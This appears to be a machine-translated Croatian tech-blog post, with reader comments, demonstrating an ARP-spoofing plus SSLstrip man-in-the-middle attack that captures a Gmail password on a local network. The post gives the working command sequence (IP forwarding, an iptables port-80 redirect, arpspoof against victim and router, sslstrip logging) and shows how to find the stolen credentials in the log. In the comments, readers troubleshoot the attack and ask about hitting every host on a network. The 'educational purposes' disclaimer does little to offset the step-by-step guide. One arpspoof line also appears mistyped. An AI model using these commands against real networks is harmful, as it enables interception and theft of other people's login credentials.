ArpSpoofing i SSlstrip u akciji.

Pozdrav blogeri.

Za danas imam mali uzorak koliko opasno može biti povezivanje u bilo koju mrežu bez sigurnosti onih koji se toliko nama sviđaju.

Za danas ću koristiti ArpSpoofing sa Sslstripom da dobijem Gmail lozinku. Kako bih okoliš učinio kontroliranijim, kreirao sam račun pod nazivom "testarp@gmail.com".

A kako mi se preambule ne sviđaju previše, prijeđimo na posao.

Ni u jednom trenutku nisam odgovoran za ono što mogu učiniti sa sljedećim informacijama. To radim isključivo u obrazovne svrhe

OKRUŽENJE

Za ovaj test imamo sljedeće:

1. Napadač: To je moj stolni ili stolni računar koji ima Debian Wheezy. Iz spremišta možete instalirati sslstrip y dsniff to get to have arpspoofing

2. Žrtva: Žrtva je Android tablet koji svoju poštu želi vidjeti samo putem preglednika.

3. Medij: Sredina je moja Cisco DPC2425 usmjerivač

ADRESE.

Adresa napadača: 172.26.0.2

Adresa usmjerivača: 172.26.0.1

Adresa žrtve: 172.26.0.8

NAPAD:

Da biste razumjeli malo više kako napad djeluje, možete otići do mog starog POST

Prva stvar koju ćemo učiniti za ovaj napad je da aktiviramo prosljeđivanje kako bi naše računalo moglo proslijediti informacije žrtvi, a da ona to ne shvati. (Inače bi to bio napad uskraćivanja usluga)

Za to ćemo koristiti:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Svaka naredba u izravnom prozoru konzole.

Sada, ako napravimo tail -f iz linuxa, informacije vidimo uživo i izravno

 

snimak1

 

Pa kako onda dobiti ono što želimo?

Prvo unesite svoju poštu na tablet. Dok se prijavljujemo, vidimo da se na našoj konzoli pojavljuju hiljade i hiljade stvari.

Sada kada ste gotovi, otvorit ćemo našu datoteku "desdelinux" s nano

nano desdelinux

sa Control + W tražimo nešto što se zove SECURE POST.

I vidjet ćemo ovako nešto.

 

snimak2

 

Među tom ogromnom linijom koja se ne može vidjeti je e-mail i lozinka žrtve.

Tako trčimo udesno dok napokon ne ugledamo svjetlost na kraju tunela.

 

snimak3

 

Drugom prilikom vidjet ćemo kako se možemo malo zaštititi od ovih napada.

Saludos


Sadržaj članka pridržava se naših principa urednička etika. Da biste prijavili grešku, kliknite ovdje.

27 komentara, ostavi svoj

Ostavite komentar

Vaša e-mail adresa neće biti objavljena. Obavezna polja su označena sa *

*

*

  1. Za podatke odgovoran: Miguel Ángel Gatón
  2. Svrha podataka: Kontrola neželjene pošte, upravljanje komentarima.
  3. Legitimacija: Vaš pristanak
  4. Komunikacija podataka: Podaci se neće dostavljati trećim stranama, osim po zakonskoj obavezi.
  5. Pohrana podataka: Baza podataka koju hostuje Occentus Networks (EU)
  6. Prava: U bilo kojem trenutku možete ograničiti, oporaviti i izbrisati svoje podatke.

  1.   @Jlcmux rekao je

    Koristim priliku da kažem da kada je objava objave naredbe nisu bile ispravne.

    Naredbi iptables na kraju nedostaje 8080 koji je na drugoj liniji. A onda su naredbe arpspoof bile na istoj liniji. Svaka naredba je na drugoj liniji.

    Nadam se da ga urednik vidi i može popraviti.

    Pozdrav.

    1.    Manuel de la Fuente rekao je

      Napravio sam ispravke koje ste spomenuli, je li to u redu?

      Ako ćete umetnuti kôd u željeni unos, koristite HTML prikaz i provjerite je li članak ispravan prije slanja na čekanje. Hvala ti.

  2.   luis rekao je

    Hladno je znati da smo oni koji nemamo znanje toliko ranjivi. Vrlo dobre informacije, čak i kad malo razumijem temu, shvatim važnost. Hvala ti!
    Saludos

  3.   Giskard rekao je

    Ali to djeluje samo ako su napadač i žrtva na istoj mreži. U svakom slučaju, čini mi se da ako se (budete na istoj mreži) povežete pomoću HTTPS-a, to se ne dešava jer su podaci šifrirani PRIJE napuštanja vašeg uređaja. Ako se povežete putem HTTP-a (bez S), mislim da čak i kada gledate mrežni kabel vidite ključeve.

    1.    @Jlcmux rekao je

      Nije istina. Hakiram gmail lozinku i ako primijetite da gmail koristi https. Pa? Poanta je u tome da iako je https siguran, to ovisi o http-u. Dakle, nije tako sigurno.

      Ne priznajte toliko o https-u da S nije za Supermana, koliko da je "siguran"

    2.    RTen rekao je

      radi sa ili bez https-a, probao sam sa specijaliziranijim linux distribucijom i radi bez problema

    3.    Manuel de la Fuente rekao je

      Možete ga precizno koristiti za podučavanje onih koji ukradu vaš Wi-Fi. 😀

      Otprilike je poput onoga što su davno rekli na blogu Cheme Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant rekao je

        Ostia, sjajno što radi! / I onda kažu mojem paranoiku svaki put kad koristim VPN kad odu provjeriti bankovni račun ...). Usput, u komentarima morate vidjeti koliko su ljudi cinični ... ako na kraju kradu ...

        1.    eliotime3000 rekao je

          Sada moramo uzeti vodič o tome kako stvoriti i ponuditi vlastitu VPN uslugu.

      2.    Danijel rekao je

        Priča koju povezujete je vrlo zanimljiva, čini mi se čak vrijedna nove knjige, i ovo me podsjeća kad sam koristio internet svojih susjeda i iako kažem da znam tu temu, mislim da nikada ne bih mogao vidjeti prave dimenzije opasnost koju sam mogao izdržati, na moju sreću, promijenili su samo lozinku u WPA2 i tu je započela moja priča s ISP-om haha

    4.    Maurice rekao je

      Zato naslov kaže Sslstrip u akciji.

      Djeluje, sve dok je napadač u sredini

  4.   anon rekao je

    Koji talas radite u prizmi? -.-
    br.
    Šta čekate da pošaljete svoj zahtjev XD
    pozdravi
    dobar post

  5.   AurosZx rekao je

    Zanimljivo, kasnije ću napraviti edukativni test ... Možda bih mogao i ukloniti lozinku za WiFi i malo se zabaviti 😛
    Bilo kojim slučajem, možete li učiniti nešto slično za slanje različitih stranica na one koje je cilj tražio? Na primjer, oni žele otvoriti Facebook, a ja ih preusmjerim na Google? 😛

    1.    @Jlcmux rekao je

      Da. Ali sve je to sasvim drugačija rola.

      Možda ću to objaviti kasnije.

  6.   lastnewbie rekao je

    vrlo dobar post, ove su teme vrlo edukativne, sada moramo biti u stanju suzbiti ovaj napad, jer bi se neki (poput mene) povezali s javnim mrežama (univerzitet na primjer), bilo bi korisno izbjeći ga.

    Pozdrav!

  7.   samo-još-dl-korisnik rekao je

    Nije mi uspjelo 🙁

  8.   woqer rekao je

    Nešto mi ovdje ne uspijeva, osim činjenice da su https veze šifrirane putem certifikata servera (kada certifikat imate na računaru, za šifriranje je zadužen vaš pretraživač), pomoću iptables preusmjeravate port 80 (http), a ne 443 što je https

    1.    @Jlcmux rekao je

      I ja sam tako mislio. Poanta je u tome što, iako je https "siguran", nažalost ovisi o http-u. Dakle, sslstrip to koristi, što čini da preglednik vjeruje da koristi https vjerodajnice, ali nije.

      1.    woqer rekao je

        sveto sranje! ali preglednik bi trebao vidjeti upozorenje poput "ovaj certifikat dolazi sa sumnjive web lokacije ili slično tome" ... Svakako ću morati obaviti XD testove

        1.    @Jlcmux rekao je

          Ne, apsolutno ništa ne izlazi.

  9.   samo-još-dl-korisnik rekao je

    Napokon mi je uspjelo
    Na WEP mrežu povezan sam lozinkom i ona mi je ionako direktno pokazala lozinku.

    Upit. Možete li učiniti isti postupak, ali za sve računare koji su povezani u mrežu, umjesto da imate jednu žrtvu?

    1.    @Jlcmux rekao je

      Da, možeš. Ali nisam radio eksperimente. Isprobajte sami i recite nam kako ste.

  10.   Sinnick19 rekao je

    Jedino što sa ovim dobijem je da se žrtvin stroj isključi van mreže, ali sslstrip mi ne pokazuje ništa: /

    1.    @Jlcmux rekao je

      Morate na trenutak onemogućiti zaštitni zid. Ili barem omogućiti dolazne veze.

  11.   Gospodin Black rekao je

    Probe i ja smo mogli vidjeti samo korisničko ime i lozinku facebook stranice, u gmailu nisam našao nijedan rezultat u dnevniku, također mi je trebao samo redak arpspoof «arpspoof -i -t«. S druge strane, mašina za žrtve nije mogla otvoriti neke stranice. Nastavit ću s istragom, vrlo je zanimljivo. Pomoć onima koji koriste Manjaro, paketi za instaliranje su: dsniff (ovdje je arpspoff), twisted i python2-pyopenssl. Sslstrip možete preuzeti ovdje: http://www.thoughtcrime.org/software/sslstrip/
    Da biste ga pokrenuli $ python2 sslstrip.py
    Pozdrav.

  12.   Gospodin Black rekao je

    Nije izašao, ali arpspoof linija je: #arpspoof -i int -t ip-жертva ip-usmjerivač

  13.   gilbert rekao je

    gledaj, radim tačno ono što kažeš:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PRERUTIRANJE -p tcp –odredišni port 80 -j REDIRECT –to ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    problem je u tome što žrtva, koja je još jedan računar koji imam ovdje u svojoj sobi, nemam veze s tim da moram ponovno pokrenuti usmjerivač, što mi može pomoći.

    Druga stvar je što radim s virtualnom mašinom, a kada izvršim naredbu iwconfig, wlan0 se ne pojavljuje, niti kada izvršavam ifconfig, međutim, ako imam internet na svojoj virtualnoj mašini, što sa eth0 sučeljem.